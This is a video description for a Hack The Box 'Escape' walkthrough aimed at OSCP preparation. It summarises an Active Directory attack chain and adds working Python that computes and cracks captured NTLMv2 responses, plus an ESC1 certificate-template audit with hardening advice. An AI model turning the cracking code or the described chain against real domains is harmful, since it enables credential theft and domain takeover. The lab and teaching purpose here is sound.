Escape - Hackthebox (OSCP Prep)

Video Link: https://www.youtube.com/watch?v=Np2B5iHkirg



Duration: 53:16


Welcome to my Escape video from Hack The Box. This one has been done over and over again, but not by me, and though I might use the same attacks or tools, it's novel to me. I completed this one a very long time ago when it came out, but decided I need to go back over it since I had forgotten the way in, and it's part of TJ Null's list of recommended OSCP-like boxes.
The point of these videos and live streams is to learn and have a good time. I'm streaming this content not because I'm an expert but because I'm here to learn and put myself out there.

Escape is a Medium difficulty Windows Active Directory machine. It starts with an SMB share from which guest-authenticated users can download a sensitive PDF file. Inside the PDF are temporary credentials for an MSSQL service running on the machine. Using that access, an attacker can force the MSSQL service to authenticate to the attacker's own machine and capture the NTLMv2 challenge-response. It turns out the service runs under a user account, and its password is weak enough for that capture to be cracked offline. With a valid set of credentials, the attacker gets command execution on the machine over WinRM. Enumerating the machine, a log file reveals the credentials for the user `ryan.cooper`. Further enumeration reveals that a Certificate Authority is present and that one certificate template is vulnerable to the ESC1 attack, meaning that users who are eligible to enrol in this template can request certificates for any other user on the domain, including Domain Administrators. By exploiting ESC1, the attacker obtains a valid certificate for the Administrator account and uses it to authenticate as Administrator and recover that account's hash.
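The forced-authentication step above pays off because what the MSSQL service account sends to the attacker's SMB listener is an NTLMv2 challenge-response, and that response can be brute-forced offline without ever talking to the domain again. The following Python is an added example (not code from the video, from Hack The Box, or from any of the tools listed below): it recomputes the NTLMv2 response the way MS-NLMP specifies it, formats a capture the way hashcat mode 5600 expects, and cracks a constructed capture against a small wordlist. The account name `svc_mssql`, domain `CORP`, password, both challenges, the timestamp and the wordlist are constructed placeholders; MD4 is implemented inline because `hashlib`'s md4 is disabled under many OpenSSL 3 builds.

```python
import hashlib
import hmac
import struct
from typing import Iterable, Optional

MASK32 = 0xFFFFFFFF


def _rotl(v: int, n: int) -> int:
    return ((v << n) | (v >> (32 - n))) & MASK32


def md4(data: bytes) -> bytes:
    """Pure-Python MD4 (RFC 1320). hashlib's md4 is disabled under many OpenSSL 3 builds."""
    msg = bytearray(data) + b"\x80"
    while len(msg) % 64 != 56:
        msg += b"\x00"
    msg += struct.pack("<Q", (len(data) * 8) & 0xFFFFFFFFFFFFFFFF)
    state = [0x67452301, 0xEFCDAB89, 0x98BADCFE, 0x10325476]
    f = lambda x, y, z: (x & y) | (~x & z)
    g = lambda x, y, z: (x & y) | (x & z) | (y & z)
    h = lambda x, y, z: x ^ y ^ z
    order2 = [0, 4, 8, 12, 1, 5, 9, 13, 2, 6, 10, 14, 3, 7, 11, 15]
    order3 = [0, 8, 4, 12, 2, 10, 6, 14, 1, 9, 5, 13, 3, 11, 7, 15]
    for off in range(0, len(msg), 64):
        x = struct.unpack("<16I", bytes(msg[off:off + 64]))
        a, b, c, d = state
        for i in range(16):  # round 1
            a = _rotl((a + f(b, c, d) + x[i]) & MASK32, (3, 7, 11, 19)[i % 4])
            a, b, c, d = d, a, b, c
        for i in range(16):  # round 2
            a = _rotl((a + g(b, c, d) + x[order2[i]] + 0x5A827999) & MASK32, (3, 5, 9, 13)[i % 4])
            a, b, c, d = d, a, b, c
        for i in range(16):  # round 3
            a = _rotl((a + h(b, c, d) + x[order3[i]] + 0x6ED9EBA1) & MASK32, (3, 9, 11, 15)[i % 4])
            a, b, c, d = d, a, b, c
        state = [(s + v) & MASK32 for s, v in zip(state, (a, b, c, d))]
    return struct.pack("<4I", *state)


def nt_hash(password: str) -> bytes:
    """NT hash = MD4 of the UTF-16LE password (what the DC stores, and what the ESC1 step ultimately yields)."""
    return md4(password.encode("utf-16-le"))


def ntowf_v2(password: str, user: str, domain: str) -> bytes:
    """MS-NLMP NTOWFv2: HMAC-MD5 keyed with the NT hash over UPPER(user) + domain (domain case is kept)."""
    return hmac.new(nt_hash(password), (user.upper() + domain).encode("utf-16-le"), hashlib.md5).digest()


def ntlmv2_proof(response_key: bytes, server_challenge: bytes, blob: bytes) -> bytes:
    """NTProofStr: HMAC-MD5 over the 8-byte server challenge followed by the client blob."""
    return hmac.new(response_key, server_challenge + blob, hashlib.md5).digest()


def build_blob(timestamp: int, client_challenge: bytes, domain: str) -> bytes:
    """NTLMv2_CLIENT_CHALLENGE: type bytes, reserved, FILETIME, client nonce, reserved, AV pairs, reserved."""
    av_pairs = (struct.pack("<HH", 0x0002, len(domain) * 2) + domain.encode("utf-16-le")  # MsvAvNbDomainName
                + struct.pack("<HH", 0x0000, 0))                                           # MsvAvEOL
    return (b"\x01\x01" + b"\x00" * 6 + struct.pack("<Q", timestamp) + client_challenge
            + b"\x00" * 4 + av_pairs + b"\x00" * 4)


def hashcat_5600_line(user: str, domain: str, password: str, server_challenge: bytes, blob: bytes) -> str:
    """What a capturing listener writes out for an NTLMv2 exchange: USER::DOMAIN:challenge:proof:blob (hex)."""
    proof = ntlmv2_proof(ntowf_v2(password, user, domain), server_challenge, blob)
    return f"{user}::{domain}:{server_challenge.hex()}:{proof.hex()}:{blob.hex()}"


def crack_5600(line: str, wordlist: Iterable[str]) -> Optional[str]:
    """Offline guessing: recompute NTProofStr per candidate; the capture itself never contains the password."""
    user, _, domain, chal_hex, proof_hex, blob_hex = line.split(":")
    server_challenge, blob, target = bytes.fromhex(chal_hex), bytes.fromhex(blob_hex), bytes.fromhex(proof_hex)
    for candidate in wordlist:
        if hmac.compare_digest(ntlmv2_proof(ntowf_v2(candidate, user, domain), server_challenge, blob), target):
            return candidate
    return None


# Constructed sample: a service account with a guessable password, both challenges fixed for reproducibility.
SAMPLE_USER, SAMPLE_DOMAIN, SAMPLE_PASSWORD = "svc_mssql", "CORP", "Spring2024!"
SERVER_CHALLENGE = bytes.fromhex("1122334455667788")   # in a real capture, chosen by the attacker's listener
CLIENT_CHALLENGE = bytes.fromhex("8877665544332211")   # chosen by the victim client
SAMPLE_TIMESTAMP = 133500000000000000                   # constructed Windows FILETIME
CAPTURED_LINE = hashcat_5600_line(SAMPLE_USER, SAMPLE_DOMAIN, SAMPLE_PASSWORD, SERVER_CHALLENGE,
                                  build_blob(SAMPLE_TIMESTAMP, CLIENT_CHALLENGE, SAMPLE_DOMAIN))
SMALL_WORDLIST = ["Password1", "Welcome1", "Summer2023!", "Spring2024!", "letmein"]


def demo() -> Optional[str]:
    """Crack the constructed capture; returns the recovered password or None."""
    return crack_5600(CAPTURED_LINE, SMALL_WORDLIST)


if __name__ == "__main__":
    print("captured:", CAPTURED_LINE)
    print("cracked :", demo())
```

Two things worth noticing in the code: the server challenge is the only value the attacker controls, so the listener can hand out a fixed one, but the client blob still carries a client nonce and timestamp, which is why an NTLMv2 capture can only be cracked, not replayed or used in a rainbow table; and the crack loop does exactly one HMAC-MD5 pair per candidate, which is why a dictionary-grade service-account password falls in seconds on hashcat.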
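ESC1, as the synopsis describes it, is not a single bug but a conjunction of template settings: the enrollee may supply the subject (so an arbitrary UPN can be placed in the SAN), the issued certificate carries an EKU usable for domain authentication, no manager approval or authorized signature gates issuance, the template is published, and a low-privileged principal holds enrollment rights. Remove any one of them and the attack fails. The check below is an added example (not certipy's code or its output format) that evaluates those preconditions over constructed template records and reports which one, if any, blocks the attack. The template names, the simplified name-flag value used for the stock `User` template, and the principal names are constructed for the illustration; the flag constants and EKU OIDs are the real values.

```python
from dataclasses import dataclass
from typing import Dict, List

# Real AD attribute bit values (msPKI-Certificate-Name-Flag / msPKI-Enrollment-Flag).
CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT = 0x00000001   # requester puts the subject/SAN in the CSR
CT_FLAG_PEND_ALL_REQUESTS = 0x00000002           # CA manager approval required before issuance

# EKUs that make an issued certificate usable for domain authentication (PKINIT / Schannel).
AUTH_EKUS = {
    "1.3.6.1.5.5.7.3.2",       # Client Authentication
    "1.3.6.1.5.2.3.4",         # PKINIT Client Authentication
    "1.3.6.1.4.1.311.20.2.2",  # Smart Card Logon
    "2.5.29.37.0",             # Any Purpose
}
# Principals whose membership every domain account effectively has.
LOW_PRIV_PRINCIPALS = {"Domain Users", "Authenticated Users", "Domain Computers", "Everyone"}


@dataclass
class Template:
    """Constructed record shape for this example; map certipy/LDAP output onto it in practice."""
    name: str
    enabled: bool                 # published on at least one CA
    name_flag: int                # msPKI-Certificate-Name-Flag
    enrollment_flag: int          # msPKI-Enrollment-Flag
    ra_signatures: int            # msPKI-RA-Signature (authorized signatures required)
    ekus: List[str]               # empty list = no EKU restriction (SubCA-style templates)
    enroll_principals: List[str]  # who holds Enroll / AutoEnroll on the template ACL


def esc1_blockers(t: Template) -> List[str]:
    """Return the ESC1 preconditions this template fails; an empty list means it is abusable."""
    blockers: List[str] = []
    if not t.enabled:
        blockers.append("not published on any CA")
    if not (t.name_flag & CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT):
        blockers.append("subject is built from the AD object, enrollee cannot supply a SAN")
    if t.enrollment_flag & CT_FLAG_PEND_ALL_REQUESTS:
        blockers.append("CA manager approval required")
    if t.ra_signatures > 0:
        blockers.append(f"{t.ra_signatures} authorized signature(s) required")
    if t.ekus and not (set(t.ekus) & AUTH_EKUS):
        blockers.append("no EKU usable for domain authentication")
    if not (set(t.enroll_principals) & LOW_PRIV_PRINCIPALS):
        blockers.append("no low-privileged principal holds enrollment rights")
    return blockers


def is_esc1(t: Template) -> bool:
    return not esc1_blockers(t)


def audit(templates: List[Template]) -> Dict[str, List[str]]:
    """Map template name -> list of blockers (empty list = ESC1)."""
    return {t.name: esc1_blockers(t) for t in templates}


# Constructed templates: one ESC1-abusable, the same one hardened, a simplified stock User, and a SubCA-style one.
TEMPLATES = [
    Template("UserAuthentication", True, CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT, 0, 0,
             ["1.3.6.1.5.5.7.3.2"], ["Domain Users"]),
    Template("UserAuthentication-Hardened", True, CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT, CT_FLAG_PEND_ALL_REQUESTS, 0,
             ["1.3.6.1.5.5.7.3.2"], ["CORP\\PKI Enrollment Operators"]),
    Template("User", True, 0, 0, 0,
             ["1.3.6.1.5.5.7.3.2", "1.3.6.1.5.5.7.3.4", "1.3.6.1.4.1.311.10.3.4"], ["Domain Users"]),
    Template("SubCA", True, CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT, 0, 0,
             [], ["Domain Admins"]),
]

if __name__ == "__main__":
    for name, blockers in audit(TEMPLATES).items():
        print(f"{name:32s} {'ESC1' if not blockers else 'not ESC1: ' + '; '.join(blockers)}")
```

The `SubCA` record is the case worth remembering: no EKU at all still counts as authentication-capable, and only its enrollment ACL keeps it out of reach. Conversely, the hardened copy shows the two cheapest fixes for an offending template, requiring CA manager approval and narrowing the enrollment ACL; either one alone is enough to turn the finding off, but both should be applied so that one later ACL change does not silently reopen it.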

Skills Required:
- Enumeration
- Windows Active Directory
- Microsoft SQL server

Skills Learned:
- Kerberos Authentication
- ESC1 attack
- NTLM Authentication

Vulnerabilities:
- Misconfiguration
- Active Directory Certificate Services ESC1
- Anonymous/Guest Access

Tools:
- rustscan
- impacket
- johntheripper
- hashcat
- Certipy
- evil-winrm
- smbclient
- smbmap

Certifications:
Practical Network Penetration Tester (PNPT) : TCM Security - https://certifications.tcm-sec.com/pnpt/
Practical Junior Penetration Tester (PJPT): TCM Security - https://certifications.tcm-sec.com/pjpt/
Practical Junior Web Tester (PJWT): TCM Security - https://certifications.tcm-sec.com/pjwt/
Certified Ethical Hacker (CEH): EC-Council
--------------------
Socials:
Tryhackme: https://tryhackme.com/p/NoxLumens
Hackthebox: https://app.hackthebox.com/profile/179139
Twitch: https://twitch.tv/noxlumens

Tags:
noxlumens
noxlumen
hacking
cyber security
oscp
oscp prep
kali linux
hacker
cyber
malware
active directory
pentesting
web app pentesting
network pentesting
ctf
cyber ctf
offsec
offsec oscp
gobuster
ad pentesting
active directory pentesting
enumeration
hackthebox
netexec
active hackthebox
tjnulls
tj nulls oscp
ldap enumeration
ldap hacking
escape hackthebox
escape ctf
escape
adcs esc1
adcs
active directory certificate service escalation 1
escape tj nulls